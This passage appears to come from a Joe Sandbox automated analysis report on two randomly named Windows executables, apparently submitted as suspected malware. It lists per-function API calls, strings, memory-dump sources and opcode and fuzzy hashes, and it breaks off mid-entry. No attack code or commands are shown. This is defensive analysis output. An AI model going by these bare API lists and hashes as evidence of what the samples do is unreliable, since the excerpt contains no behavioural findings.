Instruction Fuzzy Hash: 08E04861F0970296FF187B75A859139A350AF48B41FA8443AC82F473A4DD7CE099E730

Function 00007FF731C7E35C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 176COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C7E559

Strings

DXGIDebug.dll, xrefs: 00007FF731C7E36A

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: DXGIDebug.dll
API String ID: 3668304517-540382549
Opcode ID: ada38951124cec9a0e116e3a1c84714f16beb5e64cf8bb08149ba912fedf6f7a
Instruction ID: 4d64c2a746f501eb9a59ae6be4beb7ae94a3936a351e169d4fb35c06088ebf0c
Opcode Fuzzy Hash: ada38951124cec9a0e116e3a1c84714f16beb5e64cf8bb08149ba912fedf6f7a
Instruction Fuzzy Hash: A371CE32A14B81A6EB14DF65E8443ADB3A4FB187D4FA04635DBAC03B95DFB8E461D300

Function 00007FF731CAE174 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF731CAE1B7

Strings

e+000, xrefs: 00007FF731CAE25F
gfff, xrefs: 00007FF731CAE2E2

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: e+000$gfff
API String ID: 3215553584-3030954782
Opcode ID: f19aa8e360a5519298b9773b70f05fda243e234b3046621750ac1af24fd8595b
Instruction ID: 3712b558d46a0f1acc6a9e813b297468e04603bb9a4c3a3ae467ad98cbf26590
Opcode Fuzzy Hash: f19aa8e360a5519298b9773b70f05fda243e234b3046621750ac1af24fd8595b
Instruction Fuzzy Hash: 9A516A62F187C29AE7269F39984036DEB91EB80B90F988731C79C47BC6CE6CE450C710

Function 00007FF731C893C8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF731C89568: swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF731C895A6

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C8955C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C89562

Strings

SIZE, xrefs: 00007FF731C89403

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$swprintf
String ID: SIZE
API String ID: 449872665-3243624926
Opcode ID: 67c97aca8507826492130fd72c7ecce989bee0afc1e7b5207916a55734ded634
Instruction ID: 0b0571414fb2f1d5f3a04d34a4ed45fbd86f5fd2f0785d9faa12cd4b462e9c51
Opcode Fuzzy Hash: 67c97aca8507826492130fd72c7ecce989bee0afc1e7b5207916a55734ded634
Instruction Fuzzy Hash: 3D41B562E1878665EB11EB64E4853BDE360EFC57A0FE04231E69C03AD5EEBCD541D720

Function 00007FF731CAC240 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF731CAC26A
GetModuleFileNameA.KERNEL32(?,?,?,?,?,00007FF731CA2C55), ref: 00007FF731CAC28B

Strings

C:\Users\user\Desktop\5fr5gthkjdg71.exe, xrefs: 00007FF731CAC279

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: FileModuleName_invalid_parameter_noinfo
String ID: C:\Users\user\Desktop\5fr5gthkjdg71.exe
API String ID: 3307058713-4156724931
Opcode ID: a0d8c3237379257ab40db39896a4593fde12318382e3262d4c43878eda6e4b0c
Instruction ID: 9ebf2228fb942aa6f25f9f7230b349b4f99a3c606a225f4ae5cca0858edf4409
Opcode Fuzzy Hash: a0d8c3237379257ab40db39896a4593fde12318382e3262d4c43878eda6e4b0c
Instruction Fuzzy Hash: 7341B132E08A02A5EB56FF29A8400BCF794FF44BC4BA44435E90D47745DEBDE881D364

Function 00007FF731C99AC0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 104COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF731C7255C: GetDlgItem.USER32 ref: 00007FF731C725AC
Part of subcall function 00007FF731C7255C: SetWindowTextW.USER32 ref: 00007FF731C725C8

EndDialog.USER32 ref: 00007FF731C99BA4
SetDlgItemTextW.USER32 ref: 00007FF731C99C2A

Strings

ASKNEXTVOL, xrefs: 00007FF731C99AF2

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: ASKNEXTVOL
API String ID: 445417207-3402441367
Opcode ID: 22de5c0305e8ad35c840bc1d83534c6cebb95b1e5787128294acc2f2908b0105
Instruction ID: 897fd68613334811c540846011f94204eb32b92dff5d0595c26b3efe1f560326
Opcode Fuzzy Hash: 22de5c0305e8ad35c840bc1d83534c6cebb95b1e5787128294acc2f2908b0105
Instruction Fuzzy Hash: 75418422E1868261FB10BB15E8512BDE3A1BF85BC4FF40035DE4D07B95EEBDE451A360

Function 00007FF731C895F8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON

Download Yara Rule

APIs

_snwprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF731C896AA

Part of subcall function 00007FF731C90EE8: WideCharToMultiByte.KERNEL32 ref: 00007FF731C90F19

Strings

@%s, xrefs: 00007FF731C8968E
$%s, xrefs: 00007FF731C89697

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: ByteCharMultiWide_snwprintf
String ID: $%s$@%s
API String ID: 2650857296-834177443
Opcode ID: 92f7a5e5db808ff0627fb4716d8c563998de2da1c6043d31c744409d5dfbc019
Instruction ID: b123ae7183fdcef37f00cb18d24d544dddb336ca11a9bf4ff376bbfcd31de691
Opcode Fuzzy Hash: 92f7a5e5db808ff0627fb4716d8c563998de2da1c6043d31c744409d5dfbc019
Instruction Fuzzy Hash: 1931F472F18A46A5EB50EF65E4802E9E3A0FB84788FE01032EE0D17B55EE7CE501E710

Function 00007FF731CAEA84 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32 ref: 00007FF731CAEAF6
GetFileType.KERNEL32 ref: 00007FF731CAEB0C

Strings

@, xrefs: 00007FF731CAEB37

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: FileHandleType
String ID: @
API String ID: 3000768030-2766056989
Opcode ID: 8946ec43ce519745a17379b38ab7ff34034f07d291e36c027c9943bde98f32e6
Instruction ID: 9516451076143ce1d8e39392fe0b77ae014fbc6be4c4117b91e181f884453799
Opcode Fuzzy Hash: 8946ec43ce519745a17379b38ab7ff34034f07d291e36c027c9943bde98f32e6
Instruction Fuzzy Hash: C6210622E0878250EB719B28A494139AB50FB45774FB80735D66F03BD4CEBCD891E3B4

Function 00007FF731CA3FF8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF731CA1CBE), ref: 00007FF731CA403C
RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF731CA1CBE), ref: 00007FF731CA4082

Strings

csm, xrefs: 00007FF731CA406F

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 1d5db736ccfdc40490821f2c69de7fb41a1095ad17331bc3641baf3fc80bbebe
Instruction ID: 18da78552f31586b22250058f5e66784db855d57536a1c30cc7c8af11df434b3
Opcode Fuzzy Hash: 1d5db736ccfdc40490821f2c69de7fb41a1095ad17331bc3641baf3fc80bbebe
Instruction Fuzzy Hash: A8114F32A08B8192EB219F15E4402A9B7A5FB88B94F688635DF8D07768DF7CD551DB00

Function 00007FF731C8E9D8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,00007FF731C8E8DB,?,?,?,00007FF731C845FA,?,?,?), ref: 00007FF731C8E9DF
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF731C8E8DB,?,?,?,00007FF731C845FA,?,?,?), ref: 00007FF731C8E9EA

Strings

WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00007FF731C8E9F4

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: ErrorLastObjectSingleWait
String ID: WaitForMultipleObjects error %d, GetLastError %d
API String ID: 1211598281-2248577382
Opcode ID: 54b8b47555da90577a26e8fb1f909d889ddb1753417e6592717e91a991b71306
Instruction ID: c5f95cb08196a1fa975bbef4727611007f2b48dc7538181aea73b5c9eefdb762
Opcode Fuzzy Hash: 54b8b47555da90577a26e8fb1f909d889ddb1753417e6592717e91a991b71306
Instruction Fuzzy Hash: 95E09A61E1A842A1F704B735AC861A8A311BF657B0FF48331D13E815E19EACA555A321

Function 00007FF731C8A3FC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF731C8A407
FindResourceW.KERNEL32 ref: 00007FF731C8A41D

Strings

RTL, xrefs: 00007FF731C8A413

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: FindHandleModuleResource
String ID: RTL
API String ID: 3537982541-834975271
Opcode ID: e3168a20bccc75ec722704d5b9360ecacf73fabbe3432b4ac0f8e016f3fe19b7
Instruction ID: eb736b023820b8e3f74662eb4389c6ffcd77cc15cac7e095955c4f91ad05d7d0
Opcode Fuzzy Hash: e3168a20bccc75ec722704d5b9360ecacf73fabbe3432b4ac0f8e016f3fe19b7
Instruction Fuzzy Hash: ACD05E91F0A60292FF19ABB5A449334A360AF1DB41FE8A038C90E46390EEBCD084D760

Analysis Process: gfiKDLgr58thy4d.exePID: 7528, Parent PID: 7452COMMON

Execution Graph

Execution Coverage:	3.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	8.2%
Total number of Nodes:	85
Total number of Limit Nodes:	3

Executed Functions

Function 00007FF6880C118B Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 108
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32 ref: 00007FF6880C11A5
_amsg_exit.MSVCRT ref: 00007FF6880C11CC
_initterm.MSVCRT ref: 00007FF6880C120F
SetUnhandledExceptionFilter.KERNEL32(?,?,?,00007FF6880C1156), ref: 00007FF6880C124E
malloc.MSVCRT ref: 00007FF6880C127E
strlen.MSVCRT ref: 00007FF6880C12A4
malloc.MSVCRT ref: 00007FF6880C12B0
memcpy.MSVCRT ref: 00007FF6880C12C3
_cexit.MSVCRT ref: 00007FF6880C132D

Strings

{*, xrefs: 00007FF6880C1310
&, xrefs: 00007FF6880C1265

Memory Dump Source

Source File: 00000001.00000002.1790359041.00007FF6880C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6880C0000, based on PE: true

Associated: 00000001.00000002.1790324357.00007FF6880C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1790391453.00007FF6880CA000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1790419340.00007FF6880CC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1790479634.00007FF6880CD000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1791031623.00007FF688349000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1791080220.00007FF688380000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6880c0000_gfiKDLgr58thy4d.jbxd

Similarity

API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
String ID: &${*
API String ID: 2643109117-3993786024
Opcode ID: 385138cb4b144457da38e36a076bb96dc8da28c29ddbb302a2a9c00a1c84f8af
Instruction ID: 3078510eddc25f8d3e0c9b5f26926735226596e4fd5221edc6c3d1f1a11a4f49
Opcode Fuzzy Hash: 385138cb4b144457da38e36a076bb96dc8da28c29ddbb302a2a9c00a1c84f8af
Instruction Fuzzy Hash: 6D412365A09A02C6FB51AFB5E9543B923A2BF99781F444039C90DC77E7DE2CE851C328

Function 00007FF6880C1394 Relevance: 1.5, APIs: 1, Instructions: 24
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtRestoreKey.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6880C1156), ref: 00007FF6880C13F7

Memory Dump Source

Source File: 00000001.00000002.1790359041.00007FF6880C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6880C0000, based on PE: true

Associated: 00000001.00000002.1790324357.00007FF6880C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1790391453.00007FF6880CA000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1790419340.00007FF6880CC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1790479634.00007FF6880CD000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1791031623.00007FF688349000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1791080220.00007FF688380000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6880c0000_gfiKDLgr58thy4d.jbxd

Similarity

API ID: Restore
String ID:
API String ID: 1214912099-0
Opcode ID: ef416661b0ae50f477c3474d23bd773f196fc4003a84255f99ed7cebba33c335
Instruction ID: 3bd69cc9a030ae8f335a941b627fcf73d0bcbe88836855a1b903dd35591026a2
Opcode Fuzzy Hash: ef416661b0ae50f477c3474d23bd773f196fc4003a84255f99ed7cebba33c335
Instruction Fuzzy Hash: 48F0E77290CB42C2D610CF61F85022A77A2FF88384B11583DEA8C837A6CF3CE050CB69

Non-executed Functions

Function 00007FF6880C11D8 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 78
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_initterm.MSVCRT ref: 00007FF6880C120F
SetUnhandledExceptionFilter.KERNEL32(?,?,?,00007FF6880C1156), ref: 00007FF6880C124E
malloc.MSVCRT ref: 00007FF6880C127E
strlen.MSVCRT ref: 00007FF6880C12A4
malloc.MSVCRT ref: 00007FF6880C12B0
memcpy.MSVCRT ref: 00007FF6880C12C3
_cexit.MSVCRT ref: 00007FF6880C132D

Strings

{*, xrefs: 00007FF6880C1310
&, xrefs: 00007FF6880C1265

Memory Dump Source

Source File: 00000001.00000002.1790359041.00007FF6880C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6880C0000, based on PE: true

Associated: 00000001.00000002.1790324357.00007FF6880C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1790391453.00007FF6880CA000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1790419340.00007FF6880CC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1790479634.00007FF6880CD000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1791031623.00007FF688349000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1791080220.00007FF688380000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6880c0000_gfiKDLgr58thy4d.jbxd

Similarity

API ID: malloc$ExceptionFilterUnhandled_cexit_inittermmemcpystrlen
String ID: &${*
API String ID: 3825114775-3993786024
Opcode ID: 593211548d2641e5e7df01e0c417a90f6472c82e1830f04aa1cd8e0ff98b8616
Instruction ID: 77ad60075f36825f5fa7c34975c2d9c11ae70a55254c2eb868a1ce8b60d38c09
Opcode Fuzzy Hash: 593211548d2641e5e7df01e0c417a90f6472c82e1830f04aa1cd8e0ff98b8616
Instruction Fuzzy Hash: 0B411265A18A02C1F711AFB5E9543B923A2BF54785F44403AC94DC7BE7DF6CE851C328

Function 00007FF6880C6790 Relevance: 28.4, APIs: 15, Strings: 1, Instructions: 371
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wcslen.MSVCRT ref: 00007FF6880C6927
_wcsnicmp.MSVCRT ref: 00007FF6880C6959
wcslen.MSVCRT ref: 00007FF6880C6969
memset.MSVCRT ref: 00007FF6880C6AF9
wcscpy.MSVCRT ref: 00007FF6880C6B04
wcscat.MSVCRT ref: 00007FF6880C6B13
memset.MSVCRT ref: 00007FF6880C6B90

Strings

X&, xrefs: 00007FF6880C6F2B

Memory Dump Source

Source File: 00000001.00000002.1790359041.00007FF6880C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6880C0000, based on PE: true

Associated: 00000001.00000002.1790324357.00007FF6880C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1790391453.00007FF6880CA000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1790419340.00007FF6880CC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1790479634.00007FF6880CD000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1791031623.00007FF688349000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1791080220.00007FF688380000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6880c0000_gfiKDLgr58thy4d.jbxd

Similarity

API ID: memsetwcslen$_wcsnicmpwcscatwcscpy
String ID: X&
API String ID: 525299370-221892188
Opcode ID: a9a036b2fccb0bffa557323bd205af2e261faba0a7a8b564e3024caf51401c41
Instruction ID: 4760faab4706e3bcf85c0e5c5d5b395fd87a621cabf084aad2fbbe9b3663ea13
Opcode Fuzzy Hash: a9a036b2fccb0bffa557323bd205af2e261faba0a7a8b564e3024caf51401c41
Instruction Fuzzy Hash: 10226B65C2D683C6F712AFB9E8412B46B61BF91744F08423DD98DD66E2EF2CA245C31C

Function 00007FF6880C3352 Relevance: 21.2, APIs: 9, Strings: 5, Instructions: 205
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00007FF6880C33B2
memset.MSVCRT ref: 00007FF6880C3445
wcscpy.MSVCRT ref: 00007FF6880C349D
wcscat.MSVCRT ref: 00007FF6880C34A8
wcslen.MSVCRT ref: 00007FF6880C34B9
memset.MSVCRT ref: 00007FF6880C35D4
wcscpy.MSVCRT ref: 00007FF6880C3635
wcscat.MSVCRT ref: 00007FF6880C3640
wcslen.MSVCRT ref: 00007FF6880C3654

Strings

0, xrefs: 00007FF6880C368D
, xrefs: 00007FF6880C36DD
@, xrefs: 00007FF6880C34F1
0, xrefs: 00007FF6880C34E6
@, xrefs: 00007FF6880C3698

Memory Dump Source

Source File: 00000001.00000002.1790359041.00007FF6880C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6880C0000, based on PE: true

Associated: 00000001.00000002.1790324357.00007FF6880C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1790391453.00007FF6880CA000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1790419340.00007FF6880CC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1790479634.00007FF6880CD000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1791031623.00007FF688349000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1791080220.00007FF688380000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6880c0000_gfiKDLgr58thy4d.jbxd

Similarity

API ID: memset$wcscatwcscpywcslen
String ID: $0$0$@$@
API String ID: 4263182637-1413854666
Opcode ID: 53da9dd5fe03df7749d5368ee7ee60914f886c17cc3be08b42a408210f1a05b0
Instruction ID: 20419df55d7c5b885c654df25346669923f29c56a1fe37472bf0e8c87d29d439
Opcode Fuzzy Hash: 53da9dd5fe03df7749d5368ee7ee60914f886c17cc3be08b42a408210f1a05b0
Instruction Fuzzy Hash: 79B1AE6291C6C2C6F3219F75E4053AA77B1FF80748F044239EA8C966A6DF7CE149CB58

Function 00007FF6880C2690 Relevance: 19.6, APIs: 8, Strings: 3, Instructions: 322
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wcsncmp.MSVCRT ref: 00007FF6880C2795
memset.MSVCRT ref: 00007FF6880C2865
wcscpy.MSVCRT ref: 00007FF6880C28CE
wcscat.MSVCRT ref: 00007FF6880C28D9
wcslen.MSVCRT ref: 00007FF6880C28E1
wcslen.MSVCRT ref: 00007FF6880C28F6
wcslen.MSVCRT ref: 00007FF6880C296D
wcslen.MSVCRT ref: 00007FF6880C29E8

Strings

`, xrefs: 00007FF6880C2B91
X, xrefs: 00007FF6880C2B79
0, xrefs: 00007FF6880C279A

Memory Dump Source

